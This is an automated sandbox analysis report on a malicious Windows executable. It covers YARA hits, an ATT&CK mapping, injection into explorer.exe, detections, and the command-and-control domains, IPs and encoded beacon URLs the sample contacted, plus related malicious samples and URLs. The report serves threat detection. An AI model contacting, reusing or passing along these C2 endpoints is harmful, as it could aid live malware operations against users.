          Source: Yara matchFile source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing23Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339322 Sample: zHgm9k7WYU.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 5 other signatures 2->42 10 zHgm9k7WYU.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\zHgm9k7WYU.exe.log, ASCII 10->28 dropped 52 Detected unpacking (changes PE section rights) 10->52 54 Detected unpacking (overwrites its own PE header) 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 zHgm9k7WYU.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.fallgus.com 103.224.182.242, 49705, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 17->30 32 ricardoinman.com 34.102.136.180, 49702, 80 GOOGLEUS United States 17->32 34 5 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 explorer.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          zHgm9k7WYU.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.zHgm9k7WYU.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.zHgm9k7WYU.exe.5b0000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
          1.2.zHgm9k7WYU.exe.3620000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          7.2.explorer.exe.13b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.bigdudedesign.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D00%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.theatomicshots.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns0%Avira URL Cloudsafe
          http://www.www7456.com/xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.www7456.com
          154.86.142.251
          truetrue
            unknown
            www.fallgus.com
            103.224.182.242
            truetrue
              unknown
              ricardoinman.com
              34.102.136.180
              truetrue
                unknown
                ext-sq.squarespace.com
                198.49.23.144
                truefalse
                  high
                  www.bigdudedesign.com
                  199.59.242.153
                  truetrue
                    unknown
                    www.ricardoinman.com
                    unknown
                    unknowntrue
                      unknown
                      www.theatomicshots.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.ricardoinman.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJltrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.bigdudedesign.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0true
                        • Avira URL Cloud: safe
                        unknown
                        http://www.theatomicshots.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycnstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.www7456.com/xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddRtrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.comzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bThezHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers?zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comexplorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.carterandcone.comlzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cThezHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-jones.htmlzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleasezHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8zHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fonts.comzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleasezHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.sakkal.comzHgm9k7WYU.exe, 00000000.00000002.262333070.0000000007EF0000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.275645444.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            199.59.242.153
                                            unknownUnited States
                                            395082BODIS-NJUStrue
                                            198.49.23.144
                                            unknownUnited States
                                            53831SQUARESPACEUSfalse
                                            154.86.142.251
                                            unknownSeychelles
                                            134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                            103.224.182.242
                                            unknownAustralia
                                            133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                            34.102.136.180
                                            unknownUnited States
                                            15169GOOGLEUStrue

                                            General Information

                                            Joe Sandbox Version:31.0.0 Red Diamond
                                            Analysis ID:339322
                                            Start date:13.01.2021
                                            Start time:20:57:25
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 53s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:zHgm9k7WYU.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@6/5
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 35.5% (good quality ratio 31.9%)
                                            • Quality average: 70%
                                            • Quality standard deviation: 32.1%
                                            HCA Information:
                                            • Successful, ratio: 96%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.210.248.85, 93.184.221.240
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/339322/sample/zHgm9k7WYU.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            20:58:24API Interceptor1x Sleep call for process: zHgm9k7WYU.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            199.59.242.15365BV6gbGFl.exeGet hashmaliciousBrowse
                                            • www.fallguysmovile.com/kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv
                                            PO85937758859777.xlsxGet hashmaliciousBrowse
                                            • www.alwayadopt.com/8rg4/?RJ=WsO1qiz2dXOYooBDjHaDnsysS09xwMceuB64tfjAiEOaRoVYdCuvrl6g5TO0aeWlvtBBiA==&LFQHH=_pgx3Rd
                                            PO#218740.exeGet hashmaliciousBrowse
                                            • www.shelvesthatslude.com/wpsb/?Wxo=rpLKkbKOXOuXHBcSnbCAYX8fIodJm2eBCOkizxG+Jmq98pcfRrdFVbp7k49Tb//P+n9l&vB=lhv8
                                            g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                            • www.laalianza.net/nki/?-Z1l=PROIUmUOyDGddH4liQ5hJmVkj46+Q85xpoxC45PqJI4e45Ope3SXSrB15gOtY6GR/pks5ou7bA==&5ju=UlSpo
                                            c6Rg7xug26.exeGet hashmaliciousBrowse
                                            • www.fallguysmovile.com/kgw/?JfExsTlp=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864+OaOF7shv&njnddr=RhlPiv
                                            IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                            • www.myaarpdentalpln.com/09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS
                                            mQFXD5FxGT.exeGet hashmaliciousBrowse
                                            • thevampire_vvv.byethost32.com/loglogin.html
                                            099898892.exeGet hashmaliciousBrowse
                                            • www.fux.xyz/nt8e/?2dj=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&BR-LnJ=YVJpeDOX
                                            ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                            • ww1.survey-smiles.com/
                                            SAWR000148651.exeGet hashmaliciousBrowse
                                            • www.phymath.science/6bu2/?u6u0=C0Tcv4PEDaSqiqbiBHmU4chmBJ2Ib35dQ7WAYQJ79jvi7RJiRJeSkc3aZR5iI925ug+e&9r4l2=xPJtQXiX
                                            SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                            • www.biphome.com/th7/?Wxo=F3X7BvJsNeC3FygCw13H4IB8jadIkqJtXdmqtCOR8NGnB4xp+pRJAqP9Tbys+XJlW324&vB=lhvxP
                                            IRS Notice Letter.exeGet hashmaliciousBrowse
                                            • www.fallguysgen.com/09rb/?BjR=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1YP1OuE1trgD&ojPLdR=9r9xbv2Prvr4
                                            IRS Notice Letter.exeGet hashmaliciousBrowse
                                            • www.fallguysgen.com/09rb/?QL3=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1bj2SeINgKdVJ18iPg==&vDH4Y=N8lT8DApP2
                                            Payment Order Inv.exeGet hashmaliciousBrowse
                                            • www.lakecharlesloan.com/m98/
                                            h3dFAROdF3.exeGet hashmaliciousBrowse
                                            • www.srteamsex.com/jskg/?8pgD2lkp=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&yTIDml=X6XHfZU8d
                                            kqwqyoFz1C.exeGet hashmaliciousBrowse
                                            • www.srteamsex.com/jskg/?9roHn=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&npHhW=3fq4gDD0abs8
                                            file.exeGet hashmaliciousBrowse
                                            • www.capialhealth.com/w8en/?wZ=OZNhib&iJE=PC3EVoXx07elaN9zQ9JVPu3uhPMA8lrp9yOZFfU9U+2Z+rMvgXeGWrCKYNniyi9/Q+4F/80NIg==
                                            PByYRsoSNX.exeGet hashmaliciousBrowse
                                            • www.traptlongview.com/csv8/?wPX=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWD0h5HAfE9z&UPnDHz=SVETu4vhSBmH6
                                            3Y690n1UsS.exeGet hashmaliciousBrowse
                                            • www.globepublishers.com/csv8/?SR-D3jP=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODb9flfr/+N&J0GTk=3fPL-xo0rXp0UNn
                                            Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                                            • www.globepublishers.com/csv8/?AZ=QLtdsMlSP8ZUl/vaR7fAeOzLoSV1+fXm7wO8n0yFGAmKofcRkm3OZJHpkrvnm/Rsk+r9zQ==&1bqtf=oL30w6o
                                            198.49.23.144PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                            • www.tipsytravelerbar.com/dll/?LvZX=BXL4z&F4=LxAFUOjiWgydqqdU9loxQsWR5MNVQJhbsqL9b9M074pCJjbSowA5tp3w1jB4zCv0wG7W
                                            NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                            • www.usmedicarenow.com/bw82/?ong0rTC=cQgJWKf5RX1pgHqtrNlNvU1Wcwt7yBWYkREyiU0JrpPbxB8OGrmWpa/gYGeP1DcG9D81oQ==&PFQL=nHI4EV
                                            Tracking No_SINI0068206497.exeGet hashmaliciousBrowse
                                            • www.life-file.com/mtc/
                                            OA PO74578553.exeGet hashmaliciousBrowse
                                            • www.jordancharlesmedia.com/p0q/?Lvv0=dEUZcCgeL7/GFMT7Hz0RNwRuFURWL1saOxHgK7r6ZOxG1x4uatlayqL7ypVTuaw3Rond&VRNp=wBZlCpd8E
                                            PI DX190530.exeGet hashmaliciousBrowse
                                            • www.rendmotion.com/g2t/
                                            ORDEN RFQ07082020.exeGet hashmaliciousBrowse
                                            • www.elskercreations.com/d9s8/?tFQh=YP4LMTJ0&p0D=b3OElA88vDsdZRCbe9kbuZJPlSk5u6ktzm4NXZH478lG7368x+2btBqQRZcINhlX+xcG
                                            quote108.exeGet hashmaliciousBrowse
                                            • www.matthewjgardner.com/vcd/?GXLpr=YNQtnSGizkDKocZoj/9CweQWcgRf/Y+R/7LXxzcL0jjxfS2XphL1yGbPnd9/bmpN0xMF&jds0=p2JliV-0VZ
                                            IMAGE-04082020.exeGet hashmaliciousBrowse
                                            • www.code3forchange.com/s9ce/?hnKPLfu=H5uconl4s68FIxtHIoln4w+eYC3v8qeR/GPymYszaM2JZYL+z2HQrweww8K0HXWrFdO5JjPg+A==&Hp0xlB=0nGP-6
                                            https://onedrive.live.com/download?cid=DAC345CC0B5C7EB4&resid=DAC345CC0B5C7EB4%21167&authkey=ABUO3nW2AbK7LE8Get hashmaliciousBrowse
                                            • www.cloverhill.church/p9g/?fxo8sfD=3NM8YSreLjqS/RZAgU9ET2SiP2CAQ4pcat/9bvcysN59A+Opzp9XditLA5LDq4OvQPLL&f48tQ=4hf0
                                            Invoice - INV-781.exeGet hashmaliciousBrowse
                                            • www.betterblendco.com/in/?dVMLX=ErMTlvNps9eAmMdoUg2hWcjYI8QNrumeMXlBSVNCpW6EjhslM/CWX5VuPGyE8AyppQ+sordjOak4ufW2IED+fA==&5jQ=6lvHQVCpC6cluFK
                                            37order pdf.exeGet hashmaliciousBrowse
                                            • www.flowwithshell.com/nk7/
                                            65INVOICE.exeGet hashmaliciousBrowse
                                            • www.jordanmfowler.com/xx/
                                            25Transfer_payment_copy pdf.exeGet hashmaliciousBrowse
                                            • www.healthyfabulous50andfit.com/hx295/?4hlhB4Up=NmkYJ9MuL4RUG0ehjwvtPfJkk5oidF1ezgRRzzxnliktom0FOwkTU/jwv9n7JwFNjjDCsGYkv1fuxFcebT+Wng==&8pNh=t4YTi2a0vzmxh
                                            20Payment Copy_PDF.exeGet hashmaliciousBrowse
                                            • www.theyogabroad.company/ph/
                                            45GQb9m0yg6z.jsGet hashmaliciousBrowse
                                            • michellemccarron.com/qake1y
                                            70MARBLE AND RAISED FLOORING PLAN.exeGet hashmaliciousBrowse
                                            • www.mattyhines.com/mr/
                                            51SHIP_DOC_000121121.exeGet hashmaliciousBrowse
